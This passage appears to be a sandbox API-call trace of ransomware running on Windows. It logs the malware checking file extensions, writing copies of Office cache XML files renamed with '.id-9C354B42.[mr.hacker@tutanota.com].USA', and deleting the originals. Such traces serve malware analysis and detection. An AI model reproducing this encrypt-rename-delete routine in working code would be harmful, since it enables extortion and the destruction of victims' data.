(lpString=".jpg") returned 4 [0034.048] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0034.048] Sleep (dwMilliseconds=0x64) [0034.184] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.184] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0034.184] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.185] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1450) returned 1 [0034.185] CloseHandle (hObject=0x164) returned 1 [0034.185] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0034.186] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.186] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.186] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.254] GetLastError () returned 0x0 [0034.255] ReadFile (in: hFile=0x164, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5aa, lpOverlapped=0x0) returned 1 [0034.277] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.289] ReadFile (in: hFile=0x164, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.289] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf6, lpOverlapped=0x0) returned 1 [0034.290] SetEndOfFile (hFile=0x170) returned 1 [0034.290] CloseHandle (hObject=0x170) returned 1 [0034.290] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.290] SetEndOfFile (hFile=0x164) returned 1 [0034.291] CloseHandle (hObject=0x164) returned 1 [0034.291] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.292] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0034.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.292] lstrlenW (lpString=".doc") returned 4 [0034.292] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.292] lstrlenW (lpString=".docx") returned 5 [0034.292] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.292] lstrlenW (lpString=".pdf") returned 4 [0034.292] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.292] lstrlenW (lpString=".xls") returned 4 [0034.292] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.292] lstrlenW (lpString=".xlsx") returned 5 [0034.292] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.292] lstrlenW (lpString=".ppt") returned 4 [0034.292] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.292] lstrlenW (lpString=".zip") returned 4 [0034.292] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.292] lstrlenW (lpString=".rar") returned 4 [0034.292] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString=".bz2") returned 4 [0034.293] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString=".7z") returned 3 [0034.293] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString=".dbf") returned 4 [0034.293] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString=".1cd") returned 4 [0034.293] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString=".jpg") returned 4 [0034.293] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString=".doc") returned 4 [0034.293] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString=".docx") returned 5 [0034.293] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.293] lstrlenW (lpString=".pdf") returned 4 [0034.293] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString=".xls") returned 4 [0034.293] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString=".xlsx") returned 5 [0034.293] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.293] lstrlenW (lpString=".ppt") returned 4 [0034.293] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.293] lstrlenW (lpString=".zip") returned 4 [0034.293] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.293] lstrlenW (lpString=".rar") returned 4 [0034.294] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.294] lstrlenW (lpString=".bz2") returned 4 [0034.294] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.294] lstrlenW (lpString=".7z") returned 3 [0034.294] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.294] lstrlenW (lpString=".dbf") returned 4 [0034.294] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.294] lstrlenW (lpString=".1cd") returned 4 [0034.294] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.294] lstrlenW (lpString=".jpg") returned 4 [0034.294] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.294] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.294] lstrlenW (lpString="Setup.xml") returned 9 [0034.294] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.294] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1886) returned 1 [0034.294] CloseHandle (hObject=0x164) returned 1 [0034.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.295] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.295] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.295] GetLastError () returned 0x0 [0034.295] ReadFile (in: hFile=0x164, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x75e, lpOverlapped=0x0) returned 1 [0034.311] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x760, lpOverlapped=0x0) returned 1 [0034.312] ReadFile (in: hFile=0x164, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.312] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.312] SetEndOfFile (hFile=0x170) returned 1 [0034.313] CloseHandle (hObject=0x170) returned 1 [0034.313] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.313] SetEndOfFile (hFile=0x164) returned 1 [0034.314] CloseHandle (hObject=0x164) returned 1 [0034.314] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.314] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.315] lstrlenW (lpString=".doc") returned 4 [0034.315] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".docx") returned 5 [0034.315] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.315] lstrlenW (lpString=".pdf") returned 4 [0034.315] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".xls") returned 4 [0034.315] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".xlsx") returned 5 [0034.315] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.315] lstrlenW (lpString=".ppt") returned 4 [0034.315] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.315] lstrlenW (lpString=".zip") returned 4 [0034.315] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.315] lstrlenW (lpString=".rar") returned 4 [0034.315] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".bz2") returned 4 [0034.315] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString=".7z") returned 3 [0034.315] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.315] lstrlenW (lpString=".dbf") returned 4 [0034.315] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.315] lstrlenW (lpString=".1cd") returned 4 [0034.315] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".jpg") returned 4 [0034.316] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".doc") returned 4 [0034.316] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".docx") returned 5 [0034.316] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.316] lstrlenW (lpString=".pdf") returned 4 [0034.316] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".xls") returned 4 [0034.316] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".xlsx") returned 5 [0034.316] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.316] lstrlenW (lpString=".ppt") returned 4 [0034.316] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".zip") returned 4 [0034.316] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.316] lstrlenW (lpString=".rar") returned 4 [0034.316] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".bz2") returned 4 [0034.316] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString=".7z") returned 3 [0034.316] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".dbf") returned 4 [0034.316] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".1cd") returned 4 [0034.316] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.316] lstrlenW (lpString=".jpg") returned 4 [0034.317] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.317] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.317] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0034.317] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.325] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1450) returned 1 [0034.325] CloseHandle (hObject=0x178) returned 1 [0034.325] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0034.325] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.325] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.325] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.325] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.325] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.325] GetLastError () returned 0x0 [0034.325] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5aa, lpOverlapped=0x0) returned 1 [0034.327] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.328] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.328] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.328] SetEndOfFile (hFile=0x17c) returned 1 [0034.328] CloseHandle (hObject=0x17c) returned 1 [0034.329] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.329] SetEndOfFile (hFile=0x178) returned 1 [0034.329] CloseHandle (hObject=0x178) returned 1 [0034.330] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.330] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.330] lstrlenW (lpString=".doc") returned 4 [0034.330] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".docx") returned 5 [0034.330] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.330] lstrlenW (lpString=".pdf") returned 4 [0034.330] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".xls") returned 4 [0034.330] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".xlsx") returned 5 [0034.330] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.330] lstrlenW (lpString=".ppt") returned 4 [0034.330] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.330] lstrlenW (lpString=".zip") returned 4 [0034.330] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.330] lstrlenW (lpString=".rar") returned 4 [0034.331] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString=".bz2") returned 4 [0034.331] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString=".7z") returned 3 [0034.331] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString=".dbf") returned 4 [0034.331] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString=".1cd") returned 4 [0034.331] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString=".jpg") returned 4 [0034.331] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString=".doc") returned 4 [0034.331] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString=".docx") returned 5 [0034.331] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.331] lstrlenW (lpString=".pdf") returned 4 [0034.331] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString=".xls") returned 4 [0034.331] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString=".xlsx") returned 5 [0034.331] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.331] lstrlenW (lpString=".ppt") returned 4 [0034.331] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.331] lstrlenW (lpString=".zip") returned 4 [0034.331] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.331] lstrlenW (lpString=".rar") returned 4 [0034.331] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.332] lstrlenW (lpString=".bz2") returned 4 [0034.332] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.332] lstrlenW (lpString=".7z") returned 3 [0034.332] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.332] lstrlenW (lpString=".dbf") returned 4 [0034.332] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 